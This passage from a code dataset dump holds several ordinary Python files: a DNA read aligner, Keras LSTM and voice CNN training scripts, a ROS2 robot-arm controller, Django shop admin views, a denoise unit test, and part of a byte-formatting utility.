generate_hashlist(ref, hash_len)\nref_r = reverse_comp(ref)\nhash_list_r = generate_hashlist(ref_r, hash_len)\n\nif verbose > 2:\n print('reference:\\n%s' % ref)\n print('rcomp ref:\\n%s' % ref_r)\n print('reference hash list:\\n%s' % str(hash_list))\n print('rcomp ref hash list:\\n%s' % str(hash_list_r))\n\noutfile = None\nif out_filename:\n outfile = open(out_filename, 'w') \n\n# stores reads & ref so we can track some mapping stats\ninfo = []\n\nprint('mapping reads...')\nfor i, read in enumerate(reads):\n rcomp = False\n # we map to both the forward and the reverse complement of the read, to see which is the best match\n pos,dist = map_read(ref, read, hash_list, hash_len)\n pos_r,dist_r = map_read(ref_r, read, hash_list_r, hash_len)\n\n if pos > -1 or pos_r > -1: # if it mapped\n if pos > -1 and pos_r > -1: # if it mapped both directions, pick the best one\n if dist_r < dist:\n pos = pos_r\n rcomp = True\n elif pos_r > -1: # else if it just mapped to the rcomp, use that one\n pos = pos_r\n rcomp = True\n # else just stick with the forward read pos & dist\n\n ref_read = ref_r[pos:pos+len(read)] if rcomp else ref[pos:pos+len(read)]\n if len(ref_read) == len(read):\n outtxt = 'read: %s ref: %s rcomp: %s pos: %d dist: %d' % (read, ref_read, rcomp, pos, dist)\n if outfile:\n outfile.write('%s\\n' % outtxt)\n else:\n print(outtxt)\n read_name = 'read_' + str(i)\n\n # store reads & ref so we can calc some stats later\n info.append((read, ref_read, rcomp, pos, i))\n else:\n if verbose > 0:\n print('failed to align read: %s to valid reference position' % read)\n\nif outfile:\n outfile.close()\n\nprint('mapped %d out of %d reads' % (len(info), len(reads)))\n\n#####################\n# evaluations\n#####################\n\n# calculate and plot coverage\n# also use this to filter out junk\ninfo_filtered = []\ncov = np.zeros(len(ref))\ncov_filtered = np.zeros(len(ref))\ncov_starts = np.zeros(len(ref))\nnum_forward = 0\nnum_rcomp = 0\nnum_filtered = 0\nfor read in info:\n score = scoremin(read[0], read[1], score_cutofflen)\n if score[0] >= score_cutoff:\n start = read[3]\n if read[2] is True: # rcomp:\n start -= len(read[0])\n num_rcomp += 1\n direction = -1\n else:\n num_forward += 1\n direction = 1\n\n if direction_filter == 0 or direction_filter == direction:\n info_filtered.append(read)\n cov_filtered[start:start+len(read[0])] += 1\n cov[start:start+len(read[0])] += 1\n cov_starts[start] += 1\n\nnum_filtered = len(info_filtered)\nprint('num filtered: %d forward: %d rcomp: %d' % (num_filtered, num_forward, num_rcomp))\n\nif want_plots:\n plt.figure('coverage')\n plt.plot(cov)\n\n plt.figure('starts')\n plt.plot(cov_starts)\n\n plt.figure('filtered coverage')\n plt.plot(cov_filtered)\n\n\nprint('filtered')\n\ncounts= {}\ncounts['A'] = 0\ncounts['C'] = 0\ncounts['G'] = 0\ncounts['T'] = 0\n\navg_scores = 0.0\nfiltered_filename = out_filename + '.filtered'\nwith open(filtered_filename, 'w') as f:\n for read in info_filtered:\n bars = ''\n for i in range(len(read[0])):\n if read[0][i] == read[1][i]:\n bars += '|'\n else:\n bars += ' '\n counts[read[0][i]] += 1\n f.write('@read: %d q-score: %.2f pos: %d rcomp: %s\\n%s\\n%s\\n%s\\n' % (read[4], scoremin(read[0], read[1], 13)[0], read[3], read[2], read[0], bars, read[1]))\n avg_scores += scoremin(read[0], read[1], 13)[0]\n\navg_scores /= len(info_filtered)\nprint('%d filtered reads with avg q-score at full length: %.2f' % (len(info_filtered), avg_scores))\n\nprint('base counts: A: %d C: %d G: %d T: %d\\n' % (counts['A'], counts['C'], counts['G'], counts['T']))\n\nif want_plots:\n plt.show()\n\n","repo_name":"meldavey/bfxtools","sub_path":"align/align_reads.py","file_name":"align_reads.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26033404368","text":"from tensorflow.keras.models import Model\r\nfrom tensorflow.keras.layers import Dropout, Dense, Embedding, LSTM, concatenate\r\nfrom tensorflow.keras import Input\r\nimport matplotlib.pyplot as plt\r\n\r\nimport text_preprocess\r\n\r\n# import os\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\n\r\nname_train, name_test, topics_train, topics_test, files_train, files_test, \\\r\ndes_train, des_test, readme_train, readme_test, label_train, label_test = text_preprocess.return_result()\r\n\r\nname_max_len, topics_max_len, files_max_len, des_max_len, readme_max_len, \\\r\nname_max_features, topics_max_features, files_max_features, \\\r\ndes_max_features, readme_max_features = text_preprocess.return_info()\r\n\r\n# print(len(name_train), name_max_len)\r\n# print(len(topics_train), topics_max_len)\r\n# print(len(des_train), des_max_len)\r\n# print(len(readme_train), readme_max_len)\r\n# print(len(files_train), files_max_len)\r\n#\r\n# wait = input(\"wait\")\r\n\r\nname_input = Input(shape=(name_max_len,), dtype='int32', name='name')\r\ntopics_input = Input(shape=(topics_max_len,), dtype='int32', name='topics')\r\ndes_input = Input(shape=(des_max_len,), dtype='int32', name='des')\r\nreadme_input = Input(shape=(readme_max_len,), dtype='int32', name='readme')\r\nfiles_input = Input(shape=(files_max_len,), dtype='int32', name='files')\r\n\r\nname_embedded = Embedding(50, 32, input_length=name_max_len)(name_input)\r\ntopics_embedded = Embedding(50, 32, input_length=topics_max_len)(topics_input)\r\ndes_embedded = Embedding(500, 32, input_length=des_max_len)(des_input)\r\nreadme_embedded = Embedding(100, 32, input_length=readme_max_len)(readme_input)\r\nfiles_embedded = Embedding(1000, 32, input_length=files_max_len)(files_input)\r\n\r\n# name_vec = Flatten()(name_embedded)\r\n# print(name_vec)\r\n# topics_vec = Flatten()(topics_embedded)\r\n# print(topics_vec)\r\n# des_vec = Flatten()(des_embedded)\r\n# print(des_vec)\r\n# readme_vec = Flatten()(readme_embedded)\r\n# print(readme_vec)\r\n# files_vec = Flatten()(files_embedded)\r\n# print(files_vec)\r\n\r\nname_vec = LSTM(128)(name_embedded)\r\nprint(name_vec)\r\ntopics_vec = LSTM(128)(topics_embedded)\r\nprint(topics_vec)\r\ndes_vec = LSTM(128)(des_embedded)\r\nprint(des_vec)\r\nreadme_vec = LSTM(128)(readme_embedded)\r\nprint(readme_vec)\r\nfiles_vec = LSTM(128)(files_embedded)\r\nprint(files_vec)\r\n\r\nconcatenated = concatenate([name_vec, topics_vec, des_vec, readme_vec, files_vec], axis=-1)\r\n# concatenated = concatenate([topics_vec, des_vec, readme_vec, files_vec], axis=-1)\r\n# print(concatenated)\r\n# wait = input(\"wait\")\r\n\r\n# input_len = 8 * topics_max_len + 16 * des_max_len + 16 * readme_max_len + 16 * files_max_len\r\nout1 = Dense(64, activation='relu')(concatenated)\r\nout1 = Dropout(0.5)(out1)\r\nout2 = Dense(32, activation='relu')(out1)\r\nout3 = Dense(16, activation='relu')(out2)\r\nfinal_out = Dense(1, activation='sigmoid')(out3)\r\n\r\nmodel = Model([name_input, topics_input, des_input, readme_input, files_input], final_out)\r\n# model = Model([topics_input, des_input, readme_input, files_input], final_out)\r\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\r\nhistory = model.fit([name_train, topics_train, des_train, readme_train, files_train], label_train, epochs=40,\r\n batch_size=32, validation_split=0.2, shuffle=True)\r\n# history = model.fit([topics_train, des_train, readme_train, files_train], label_train, epochs=10,\r\n# batch_size=32, validation_split=0.2)\r\n\r\nacc = history.history['acc']\r\nval_acc = history.history['val_acc']\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\n\r\nepochs = range(1, len(acc) + 1)\r\n\r\nplt.plot(epochs, acc, 'bo', label='Training acc')\r\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\r\nplt.title('Training and validation accuracy')\r\nplt.legend()\r\n\r\nplt.figure()\r\n\r\nplt.plot(epochs, loss, 'bo', label='Training loss')\r\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\r\nplt.title('Training and validation loss')\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\n# name_model = Sequential()\r\n# name_model.add(Embedding(name_max_features, 32, input_length=name_max_len))\r\n# name_model.add(Flatten())\r\n#\r\n# topics_model = Sequential()\r\n# topics_model.add(Embedding(1000, 128, input_length=topics_max_len))\r\n# topics_model.add(Flatten())\r\n# # topics_model.add(Dense(128, activation='relu'))\r\n# topics_model.add(Dense(1, activation='sigmoid'))\r\n# topics_model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\r\n# topics_model.summary()\r\n#\r\n# history = topics_model.fit(topics_train, label_train, epochs=10, batch_size=32, validation_split=0.2)\r\n\r\n# model = Sequential()\r\n# model.add(Embedding(1000, 128, input_length=topics_max_len))\r\n# model.add(Flatten())\r\n# model.add(LSTM(256))\r\n# model.add(Dense(128, activation='relu'))\r\n# model.add(Dense(1, activation='sigmoid'))\r\n# model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\r\n# model.summary()\r\n# history = model.fit(topics_train, label_train,\r\n# epochs=10,\r\n# batch_size=32,\r\n# validation_split=0.2)\r\n\r\n\r\n#\r\n# history = topics_model.fit(topics_train, label_train, epochs=10, batch_size=32, validation_split=0.2)\r\n#\r\n# des_model = Sequential()\r\n# des_model.add(Embedding(des_max_features, 256, input_length=des_max_len))\r\n# des_model.add(Flatten())\r\n#\r\n# readme_model = Sequential()\r\n# readme_model.add(Embedding(readme_max_features, 512, input_length=readme_max_len))\r\n# readme_model.add(Flatten())\r\n#\r\n# files_model = Sequential()\r\n# files_model.add(Embedding(files_max_features, 512, input_length=files_max_len))\r\n# files_model.add(Flatten())\r\n","repo_name":"dang-mai/deep_learning_SourceFinder","sub_path":"DL_SourceFinder_v0/SourceFinder_v0.py","file_name":"SourceFinder_v0.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18058998902","text":"#!/usr/bin/env python3\nimport rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import JointState\nfrom trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint\n\n\nclass SliderControl(Node):\n\n def __init__(self):\n super().__init__(\"slider_control\")\n self.arm_pub_ = self.create_publisher(JointTrajectory, \"arm_controller/joint_trajectory\", 10)\n self.gripper_pub_ = self.create_publisher(JointTrajectory, \"gripper_controller/joint_trajectory\", 10)\n self.sub_ = self.create_subscription(JointState, \"joint_commands\", self.sliderCallback, 10)\n self.get_logger().info(\"Slider Control Node started\")\n\n def sliderCallback(self, msg):\n arm_controller = JointTrajectory()\n gripper_controller = JointTrajectory()\n arm_controller.joint_names = [\"joint_1\", \"joint_2\", \"joint_3\"]\n gripper_controller.joint_names = [\"joint_4\"]\n\n arm_goal = JointTrajectoryPoint()\n gripper_goal = JointTrajectoryPoint()\n arm_goal.positions = msg.position[:3]\n gripper_goal.positions = [msg.position[3]]\n\n arm_controller.points.append(arm_goal)\n gripper_controller.points.append(gripper_goal)\n\n self.arm_pub_.publish(arm_controller)\n self.gripper_pub_.publish(gripper_controller)\n\n\ndef main():\n rclpy.init()\n\n simple_publisher = SliderControl()\n rclpy.spin(simple_publisher)\n \n simple_publisher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"AntoBrandi/Arduino-Bot","sub_path":"arduinobot_ws/src/arduinobot_controller/arduinobot_controller/slider_control.py","file_name":"slider_control.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"33736875735","text":"from django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Brand, KeyFeatures, Feature, Specification, Spec, Category\nfrom .forms import (\n BrandForm, KeyFeaturesForm, FeatureForm,\n SpecificationForm, SpecForm, CategoryForm)\n\n\n# Categories ******************************************************************\n\n\ndef all_categories(request):\n \"\"\" A view to show all categories \"\"\"\n\n categories = Category.objects.all()\n\n context = {\n 'categories': categories,\n }\n\n return render(request, 'categories/categories.html', context)\n\n\ndef category_detail(request, category_id):\n \"\"\" A view to show category details \"\"\"\n\n category = get_object_or_404(Category, pk=category_id)\n\n context = {\n 'category': category,\n }\n\n return render(request, 'categories/category_detail.html', context)\n\n\n@login_required\ndef add_category(request):\n \"\"\" Add a category to the categories \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = CategoryForm(request.POST, request.FILES)\n if form.is_valid():\n category = form.save()\n messages.success(request, 'Successfully added category!')\n return redirect(reverse('category_detail', args=[category.id]))\n else:\n messages.error(request, 'Failed to add category. Please ensure the form is valid.')\n else:\n form = CategoryForm()\n\n template = 'categories/add_category.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_category(request, category_id):\n \"\"\" View to edit category \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n category = get_object_or_404(Category, pk=category_id)\n if request.method == 'POST':\n form = CategoryForm(request.POST, request.FILES, instance=category)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully updated category!')\n return redirect(reverse('category_detail', args=[category.id]))\n else:\n messages.error(request,'Failed to update category. Please ensure the form is valid.')\n else:\n form = CategoryForm(instance=category)\n messages.info(request, f'You are editing {category.name}')\n\n template = 'categories/edit_category.html'\n context = {\n 'form': form,\n 'category': category,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_category(request, category_id):\n \"\"\" Delete a category from the categories \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n category = get_object_or_404(Category, pk=category_id)\n category.delete()\n messages.success(request, 'Category deleted!')\n return redirect(reverse('categories'))\n\n\n# Brands *********************************************************************\n\n\ndef all_brands(request):\n \"\"\" A view to show all brands \"\"\"\n\n brands = Brand.objects.all()\n\n context = {\n 'brands': brands,\n }\n\n return render(request, 'setup/brands.html', context)\n\n\ndef brand_detail(request, brand_id):\n \"\"\" A view to show brand details \"\"\"\n\n brand = get_object_or_404(Brand, pk=brand_id)\n\n context = {\n 'brand': brand,\n }\n\n return render(request, 'setup/brand_detail.html', context)\n\n\n@login_required\ndef add_brand(request):\n \"\"\" Add a brand to the brands \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = BrandForm(request.POST, request.FILES)\n if form.is_valid():\n brand = form.save()\n messages.success(request, 'Successfully added brand!')\n return redirect(reverse('brand_detail', args=[brand.id]))\n else:\n messages.error(request,'Failed to add brand. Please ensure the form is valid.')\n else:\n form = BrandForm()\n\n template = 'setup/add_brand.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_brand(request, brand_id):\n \"\"\" View to edit brand \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n brand = get_object_or_404(Brand, pk=brand_id)\n if request.method == 'POST':\n form = BrandForm(request.POST, request.FILES, instance=brand)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully updated brand!')\n return redirect(reverse('brand_detail', args=[brand.id]))\n else:\n messages.error(request,'Failed to update brand. Please ensure the form is valid.')\n else:\n form = BrandForm(instance=brand)\n messages.info(request, f'You are editing {brand.name}')\n\n template = 'setup/edit_brand.html'\n context = {\n 'form': form,\n 'brand': brand,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_brand(request, brand_id):\n \"\"\" Delete a brand from the brands \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n brand = get_object_or_404(Brand, pk=brand_id)\n brand.delete()\n messages.success(request, 'Brand deleted!')\n return redirect(reverse('brands'))\n\n\n# Key Features ****************************************************************\n\n\ndef all_keyfeatures(request):\n \"\"\" A view to show all keyfeatures \"\"\"\n\n keyfeatures = KeyFeatures.objects.all()\n\n context = {\n 'keyfeatures': keyfeatures,\n }\n\n return render(request, 'keyfeatures/keyfeatures.html', context)\n\n\ndef keyfeatures_detail(request, keyfeatures_id):\n \"\"\" A view to show keyfeature detail \"\"\"\n\n keyfeatures = get_object_or_404(KeyFeatures, pk=keyfeatures_id)\n\n context = {\n 'keyfeatures': keyfeatures,\n }\n\n return render(request, 'keyfeatures/keyfeatures_detail.html', context)\n\n\n@login_required\ndef add_keyfeatures(request):\n \"\"\" Add a keyfeature to the keyfeatures \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = KeyFeaturesForm(request.POST, request.FILES)\n if form.is_valid():\n keyfeatures = form.save()\n messages.success(request, 'Successfully added key features!')\n return redirect(reverse('keyfeatures'))\n else:\n messages.error(request, 'Failed to add key feature. Please ensure the form is valid.')\n else:\n form = KeyFeaturesForm()\n\n template = 'keyfeatures/add_keyfeatures.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_keyfeatures(request, keyfeatures_id):\n \"\"\" View to edit kefeatures \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n keyfeatures = get_object_or_404(KeyFeatures, pk=keyfeatures_id)\n if request.method == 'POST':\n form = KeyFeaturesForm(request.POST, request.FILES, instance=keyfeatures)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully updated key feature!')\n return redirect(reverse('keyfeatures_detail', args=[keyfeatures.id]))\n else:\n messages.error(request, 'Failed to update key feature. Please ensure the form is valid.')\n else:\n form = KeyFeaturesForm(instance=keyfeatures)\n messages.info(request, f'You are editing {keyfeatures.name}')\n\n template = 'keyfeatures/edit_keyfeatures.html'\n context = {\n 'form': form,\n 'keyfeatures': keyfeatures,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_keyfeatures(request, keyfeatures_id):\n \"\"\" Delete a brand from the brands \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n keyfeatures = get_object_or_404(KeyFeatures, pk=keyfeatures_id)\n keyfeatures.delete()\n messages.success(request, 'Keyfeature deleted!')\n return redirect(reverse('keyfeatures'))\n\n\n# Features ********************************************************************\n\n\ndef all_features(request):\n \"\"\" A view to show all features \"\"\"\n\n features = Feature.objects.all()\n\n context = {\n 'features': features,\n }\n\n return render(request, 'features/features.html', context)\n\n\n@login_required\ndef add_feature(request):\n \"\"\" Add a feature to the features \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = FeatureForm(request.POST, request.FILES)\n if form.is_valid():\n feature = form.save()\n messages.success(request, 'Successfully added feature!')\n return redirect(reverse('features'))\n else:\n messages.error(request, 'Failed to add feature. Please ensure the form is valid.')\n else:\n form = FeatureForm()\n\n template = 'features/add_feature.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_feature(request, feature_id):\n \"\"\" Delete a feature from the features \"\"\"\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n feature = get_object_or_404(Feature, pk=feature_id)\n feature.delete()\n messages.success(request, 'Feature deleted!')\n return redirect(reverse('features'))\n\n\n# Specifications **************************************************************\n\n\ndef all_specifications(request):\n \"\"\" A view to show all specifications \"\"\"\n\n specifications = Specification.objects.all()\n\n context = {\n 'specifications': specifications,\n }\n\n return render(request, 'specifications/specifications.html', context)\n\n\ndef specification_detail(request, specification_id):\n \"\"\" A view to show specification detail \"\"\"\n\n specification = get_object_or_404(Specification, pk=specification_id)\n\n context = {\n 'specification': specification,\n }\n\n return render(request, 'specifications/specification_detail.html', context)\n\n\n@login_required\ndef add_specification(request):\n \"\"\" Add a specification to the specifications \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = SpecificationForm(request.POST, request.FILES)\n if form.is_valid():\n specification = form.save()\n messages.success(request, 'Successfully added specification!')\n return redirect(reverse('specifications'))\n else:\n messages.error(request, 'Failed to add key feature. Please ensure the form is valid.')\n else:\n form = SpecificationForm()\n\n template = 'specifications/add_specification.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_specification(request, specification_id):\n \"\"\" View to edit specification \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n specification = get_object_or_404(Specification, pk=specification_id)\n if request.method == 'POST':\n form = SpecificationForm(request.POST, request.FILES, instance=specification)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully updated specification!')\n return redirect(reverse('specification_detail', args=[specification.id]))\n else:\n messages.error(request, 'Failed to update key specification. Please ensure the form is valid.')\n else:\n form = SpecificationForm(instance=specification)\n messages.info(request, f'You are editing {specification.name}')\n\n template = 'specifications/edit_specification.html'\n context = {\n 'form': form,\n 'specification': specification,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_specification(request, specification_id):\n \"\"\" Delete a specification\"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n specification = get_object_or_404(Specification, pk=specification_id)\n specification.delete()\n messages.success(request, 'Specification deleted!')\n return redirect(reverse('specifications'))\n\n\n# Specs *********************************************************************\n\n\ndef all_specs(request):\n \"\"\" A view to show all features \"\"\"\n\n specs = Spec.objects.all()\n\n context = {\n 'specs': specs,\n }\n\n return render(request, 'specs/specs.html', context)\n\n\n@login_required\ndef add_spec(request):\n \"\"\" Add a spec to the specs \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n if request.method == 'POST':\n form = SpecForm(request.POST, request.FILES)\n if form.is_valid():\n spec = form.save()\n messages.success(request, 'Successfully added spec!')\n return redirect(reverse('specs'))\n else:\n messages.error(request, 'Failed to add spec. Please ensure the form is valid.')\n else:\n form = SpecForm()\n\n template = 'specs/add_spec.html'\n context = {\n 'form': form,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef delete_spec(request, spec_id):\n \"\"\" Delete a spec from the specs \"\"\"\n\n if not request.user.is_superuser:\n messages.error(request, 'Sorry, only store owners can do that.')\n return redirect(reverse('home'))\n\n spec = get_object_or_404(Spec, pk=spec_id)\n spec.delete()\n messages.success(request, 'Spec deleted!')\n return redirect(reverse('specs'))\n","repo_name":"IvanTepes/django-e-commerce-pc-shop","sub_path":"setup/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328598888","text":"import pytest\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom knodle.trainer.utils.denoise import activate_neighbors\n\n\ndef test_denoise_knn():\n ## case 1 ##\n test_array = np.array([[0, 1], [1, 0]])\n right_result = np.array([[1, 1], [1, 1]])\n indices = np.array([[0, 1], [1, 0]])\n\n denoised_z = activate_neighbors(test_array, indices)\n assert_array_equal(denoised_z, right_result)\n\n # make sure all old matches persist and have same match values (currently always 1)\n assert denoised_z[test_array == 1].sum() == test_array[test_array == 1].sum()\n\n ## case 2 ##\n test_array = np.diag(np.ones((3,)))\n indices = np.array([\n np.array([0, 1, 2]),\n np.array([0]),\n np.array([1])\n ])\n\n right_result = np.diag(np.ones((3,)))\n right_result[0, :] = 1\n right_result[1, 0] = 1\n right_result[2, 1] = 1\n\n denoised_z = activate_neighbors(test_array, indices)\n assert_array_equal(denoised_z, right_result)\n assert denoised_z[test_array == 1].sum() == test_array[test_array == 1].sum()\n\n ## case 3 ##\n test_array = np.diag(np.ones((3,)))\n indices = np.array([\n np.array([0, 1]),\n np.array([1, 2]),\n np.array([0, 2])\n ])\n\n right_result = np.ones((3, 3))\n right_result[0, 2] = 0\n right_result[1, 0] = 0\n right_result[2, 1] = 0\n\n denoised_z = activate_neighbors(test_array, indices)\n assert_array_equal(denoised_z, right_result)\n assert denoised_z[test_array == 1].sum() == test_array[test_array == 1].sum()\n","repo_name":"knodle/knodle","sub_path":"tests/trainer/utils/test_denoise.py","file_name":"test_denoise.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"8758221748","text":"import numpy as np\nimport tensorflow as tf\nimport voicecnn\n\nif __name__ == '__main__':\n # test whether this environment support GPU training\n print(tf.config.list_physical_devices('GPU'))\n # create model\n model = voicecnn.VoiceVerificationCNN((32, 86, 1), 4)\n\n dataset_file_path = 'dataset.npy'\n labels_file_path = 'labels.npy'\n\n # load dataset\n dataset = np.load(dataset_file_path,allow_pickle=True)\n dataset = tf.convert_to_tensor(dataset)\n print('dataset ', np.shape(dataset))\n\n # load labels and convert into one-hot encoded labels\n labels = np.load(labels_file_path,allow_pickle=True)\n # Convert the string labels into integer labels\n unique_labels = list(set(labels))\n label_to_int = {label: i for i, label in enumerate(unique_labels)}\n int_labels = [label_to_int[label] for label in labels]\n # Convert the integer labels into one-hot encoded labels\n one_hot_labels = tf.keras.utils.to_categorical(int_labels, len(unique_labels))\n print('labels ', np.shape(one_hot_labels))\n # np.set_printoptions(threshold=np.inf)\n print(one_hot_labels)\n\n model.compile(optimizer=tf.optimizers.SGD(learning_rate=0.003),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n model.fit(x=dataset,y=one_hot_labels,epochs=500, batch_size=20)\n\n # save the model\n # model.save_weights('../model/model_20230209_0121.h5')\n tf.keras.models.save_model(model=model, filepath='../model/model_20230602_1208.h5')\n","repo_name":"woodecode/voiceprint_cnn","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5915182203","text":"\"\"\"util format\"\"\"\n\nimport math\nimport os\nimport re\nimport unicodedata\nfrom datetime import datetime\nfrom typing import Optional\n\n\ndef format_byte(size: float, dot=2):\n \"\"\"format byte\"\"\"\n\n # pylint: disable = R0912\n if 0 <= size < 1:\n human_size = str(round(size / 0.125, dot)) + \"b\"\n elif 1 <= size < 1024:\n human_size = str(round(size, dot)) + \"B\"\n elif math.pow(1024, 1) <= size < math.pow(1024, 2):\n human_size = str(round(size / math.pow(1024, 1), dot)) + \"KB\"\n elif math.pow(1024, 2) <= size < math.pow(1024, 3):\n human_size = str(round(size / math.pow(1024, 2), dot)) + \"MB\"\n elif math.pow(1024, 3) <= size < math.pow(1024, 4):\n human_size = str(round(size / math.pow(1024, 3), dot)) + \"GB\"\n elif math.pow(1024, 4) <= size < math.pow(1024, 5):\n human_size = str(round(size / math.pow(1024, 4), dot)) + \"TB\"\n elif math.pow(1024, 5) <= size < math.pow(1024, 6):\n human_size = str(round(size / math.pow(1024, 5), dot)) + \"PB\"\n elif math.pow(1024, 6) <= size < math.pow(1024, 7):\n human_size = str(round(size / math.pow(1024, 6), dot)) + \"EB\"\n elif math.pow(1024, 7) <= size < math.pow(1024, 8):\n human_size = str(round(size / math.pow(1024, 7), dot)) + \"ZB\"\n elif math.pow(1024, 8) <= size < math.pow(1024, 9):\n human_size = str(round(size / math.pow(1024, 8), dot)) + \"YB\"\n elif math.pow(1024, 9) <= size < math.pow(1024, 10):\n human_size = str(round(size / math.pow(1024, 9), dot)) + \"BB\"\n elif math.pow(1024, 10) <= size < math.pow(1024, 11):\n human_size = str(round(size / math.pow(1024, 10), dot)) + \"NB\"\n elif math.pow(1024, 11) <= size < math.pow(1024, 12):\n human_size = str(round(size / math.pow(1024, 11), dot)) + \"DB\"\n elif math.pow(1024, 12) <= size:\n human_size = str(round(size / math.pow(1024, 12), dot)) + \"CB\"\n else:\n raise ValueError(\n f'format_byte() takes number than or equal to 0, \" \\\n \" but less than 0 given. {size}'\n )\n return human_size\n\n\nclass SearchDateTimeResult:\n \"\"\"search result for datetime\"\"\"\n\n def __init__(\n self,\n value: str = \"\",\n right_str: str = \"\",\n left_str: str = \"\",\n match: bool = False,\n ):\n self.value = value\n self.right_str = right_str\n self.left_str = left_str\n self.match = match\n\n\ndef get_date_time(text: str, fmt: str) -> SearchDateTimeResult:\n \"\"\"Get first of date time,and split two part\n\n Parameters\n ----------\n text: str\n ready to search text\n\n Returns\n -------\n SearchDateTimeResult\n\n \"\"\"\n res = SearchDateTimeResult()\n search_text = re.sub(r\"\\s+\", \" \", text)\n regex_list = [\n # 2013.8.15 22:46:21\n r\"\\d{4}[-/\\.]{1}\\d{1,2}[-/\\.]{1}\\d{1,2}[ ]{1,}\\d{1,2}:\\d{1,2}:\\d{1,2}\",\n # \"2013.8.15 22:46\"\n r\"\\d{4}[-/\\.]{1}\\d{1,2}[-/\\.]{1}\\d{1,2}[ ]{1,}\\d{1,2}:\\d{1,2}\",\n # \"2014.5.11\"\n r\"\\d{4}[-/\\.]{1}\\d{1,2}[-/\\.]{1}\\d{1,2}\",\n # \"2014.5\"\n r\"\\d{4}[-/\\.]{1}\\d{1,2}\",\n ]\n\n format_list = [\n \"%Y-%m-%d %H:%M:%S\",\n \"%Y-%m-%d %H:%M\",\n \"%Y-%m-%d\",\n \"%Y-%m\",\n ]\n\n for i, value in enumerate(regex_list):\n search_res = re.search(value, search_text)\n if search_res:\n time_str = search_res.group(0)\n try:\n res.value = datetime.strptime(\n time_str.replace(\"/\", \"-\").replace(\".\", 